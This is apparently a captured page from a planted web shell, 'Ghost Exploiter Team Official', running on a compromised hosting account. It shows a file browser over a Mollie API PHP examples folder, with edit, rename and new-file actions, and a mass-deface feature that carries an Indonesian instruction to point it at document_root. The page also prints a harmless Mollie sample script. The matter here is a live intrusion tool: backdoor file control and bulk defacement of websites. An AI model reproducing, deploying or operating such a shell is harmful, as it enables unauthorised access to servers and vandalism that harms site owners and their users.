webshell
Ghost Exploiter Team Official
Mass Deface
Directory >>
/
home
/
whitjouh
/
public_html
/
core
/
vendor
/
mollie
/
mollie-api-php
/
examples
/
captures
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
+New File
create-capture.php
0.999KB
edt
ren
get-capture.php
0.717KB
edt
ren
list-captures.php
0.749KB
edt
ren
<?php /* * List captures for a payment using the Mollie API. */ try { /* * Initialize the Mollie API library with your API key or OAuth access token. */ require "../initialize.php"; /* * List captures for payment with ID 'tr_WDqYK6vllg'. * * See: https://docs.mollie.com/reference/v2/captures-api/list-captures */ $payment = $mollie->payments->get('tr_WDqYK6vllg'); $captures = $payment->captures(); foreach ($captures as $capture) { $amount = $capture->amount->currency . ' ' . $capture->amount->value; echo 'Captured ' . $amount . ' for payment ' . $payment->id; } } catch (\Mollie\Api\Exceptions\ApiException $e) { echo "API call failed: " . htmlspecialchars($e->getMessage()); }
<=Back
Liking